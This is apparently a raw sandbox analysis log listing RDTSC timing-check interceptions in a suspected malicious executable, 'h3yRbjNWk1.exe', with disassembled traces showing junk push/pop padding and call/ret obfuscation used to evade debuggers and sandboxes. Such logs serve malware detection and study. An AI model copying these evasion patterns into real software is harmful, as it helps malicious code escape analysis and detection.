Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C801A second address: 9C8020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8020 second address: 9C803E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C81A8 second address: 9C81BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F97B4EC49B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F97B4EC49B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C81BB second address: 9C820D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jo 00007F97B4F2EE13h 0x0000000d jns 00007F97B4F2EDEBh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F97B4F2EDD6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C864B second address: 9C8657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F97B4EC49B6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8657 second address: 9C8660 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8940 second address: 9C8946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8946 second address: 9C8979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jnl 00007F97B4F2EDC6h 0x0000000d pop edi 0x0000000e jmp 00007F97B4F2EDD8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F97B4F2EDC6h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8979 second address: 9C898E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C898E second address: 9C8996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8996 second address: 9C899A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B00 second address: 9C8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B04 second address: 9C8B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B08 second address: 9C8B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B0E second address: 9C8B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B1A second address: 9C8B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B1E second address: 9C8B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F97B4EC49B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F97B4EC49B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B35 second address: 9C8B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C8B3B second address: 9C8B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9567 second address: 9C956D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99D0 second address: 9C99EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4EC49C8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99EE second address: 9C99FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F97B4F2EDC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C99FC second address: 9C9A23 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49C7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9A23 second address: 9C9A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9A42 second address: 9C9A5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4EC49C3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9D79 second address: 9C9D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9C9D7D second address: 9C9D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CE430 second address: 9CE434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CE434 second address: 9CE47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jno 00007F97B4EC49D1h 0x00000010 jmp 00007F97B4EC49C8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 996267 second address: 99626B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CF26F second address: 9CF27B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9CF27B second address: 9CF28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F97B4F2EDCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D0B76 second address: 9D0B96 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F97B4EC49B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F97B4EC49C2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D0B96 second address: 9D0B9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FCD second address: 9D3FD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F97B4EC49B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FD7 second address: 9D3FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D3FDD second address: 9D3FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F97B4EC49C4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D41A7 second address: 9D41CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F97B4F2EDC6h 0x0000000d jmp 00007F97B4F2EDD5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D4307 second address: 9D431E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F97B4EC49B6h 0x00000008 jbe 00007F97B4EC49B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D431E second address: 9D432A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4F2EDC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D432A second address: 9D4330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D49D0 second address: 9D49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D49D7 second address: 9D49DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6B93 second address: 9D6B99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6C3D second address: 9D6C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F97B4EC49C4h 0x00000009 popad 0x0000000a jc 00007F97B4EC49BCh 0x00000010 ja 00007F97B4EC49B6h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b jmp 00007F97B4EC49C3h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6D47 second address: 9D6D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6D4B second address: 9D6D50 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6F1B second address: 9D6F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F97B4F2EDC6h 0x0000000a popad 0x0000000b push eax 0x0000000c jns 00007F97B4F2EDE1h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D6F31 second address: 9D6F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D7508 second address: 9D750C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D750C second address: 9D7524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D75CB second address: 9D75E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F97B4F2EDCAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D75E1 second address: 9D75E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D7DF7 second address: 9D7E26 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F97B4F2EDCCh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F97B4F2EDD1h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA225 second address: 9DA27B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F97B4EC49B8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 adc di, ED21h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e and edi, 364CD7DDh 0x00000034 pop esi 0x00000035 push eax 0x00000036 pushad 0x00000037 jo 00007F97B4EC49C3h 0x0000003d jmp 00007F97B4EC49BDh 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9D9FBF second address: 9D9FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA9B3 second address: 9DA9B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DA9B9 second address: 9DA9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F97B4F2EDC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DB729 second address: 9DB72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD202 second address: 9DD20C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4F2EDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD20C second address: 9DD212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD212 second address: 9DD239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F97B4F2EDD4h 0x0000000f jng 00007F97B4F2EDCEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD8E6 second address: 9DD8FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DD8FA second address: 9DD8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3D2 second address: 9DE3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3D8 second address: 9DE3E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3E6 second address: 9DE3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DE3EA second address: 9DE3EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E1A82 second address: 9E1A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F97B4EC49C2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9DEB60 second address: 9DEB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3807 second address: 9E380B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E380B second address: 9E3811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3811 second address: 9E381B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F97B4EC49BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E381B second address: 9E3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3826 second address: 9E382C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E382C second address: 9E3844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDD1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3DB1 second address: 9E3DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3DB5 second address: 9E3DC7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F97B4F2EDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4D89 second address: 9E4D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4D8D second address: 9E4DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F97B4F2EDD5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F97B4F2EDDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E3FDE second address: 9E3FFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5DAB second address: 9E5DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F97B4F2EDD3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E4FF4 second address: 9E5010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5DC5 second address: 9E5E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 xor ebx, 0A68190Bh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F97B4F2EDC8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D295Dh] 0x00000030 mov dword ptr [ebp+122D1FDCh], edi 0x00000036 push 00000000h 0x00000038 adc ebx, 6013FA28h 0x0000003e push eax 0x0000003f pushad 0x00000040 jp 00007F97B4F2EDCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5010 second address: 9E5016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5E13 second address: 9E5E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E5016 second address: 9E501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E6D98 second address: 9E6D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7D8F second address: 9E7D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 9E7D95 second address: 9E7E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F97B4F2EDCEh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F97B4F2EDC8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, esi 0x0000002d xor dword ptr [ebp+122D1BA0h], ebx 0x00000033 push 00000000h 0x00000035 sbb bx, C96Bh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F97B4F2EDC8h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 